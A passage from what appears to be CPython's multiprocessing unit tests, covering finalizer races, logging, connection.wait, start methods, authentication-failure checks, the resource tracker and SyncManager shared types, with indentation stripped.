util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with threading_helper.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(glob.escape(folder), '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
@hashlib_helper.requires_hashdigest('md5')
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
@hashlib_helper.requires_hashdigest('md5')
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.create_server((socket_helper.HOST, 0))
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['spawn', 'fork'] or
methods == ['fork', 'spawn', 'forkserver'] or
methods == ['spawn', 'fork', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def test_resource_tracker(self):
#
# Check that killing process does not leak named semaphores
#
cmd = '''if 1:
import time, os, tempfile
import multiprocessing as mp
from multiprocessing import resource_tracker
from multiprocessing.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = ('resource_tracker: There appear to be 2 leaked {} '
'objects'.format(
rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
support.wait_process(pid, exitcode=-signal.SIGKILL)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
# The pid should be None in the child process, expect for the fork
# context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
def test_close(self):
queue = multiprocessing.SimpleQueue()
queue.close()
# closing a queue twice should not fail
queue.close()
# Test specific to CPython since it tests private attributes
@test.support.cpython_only
def test_closed(self):
queue = multiprocessing.SimpleQueue()
queue.close()
self.assertTrue(queue._reader.closed)
self.assertTrue(queue._writer.closed)
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
@hashlib_helper.requires_hashdigest('md5')
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
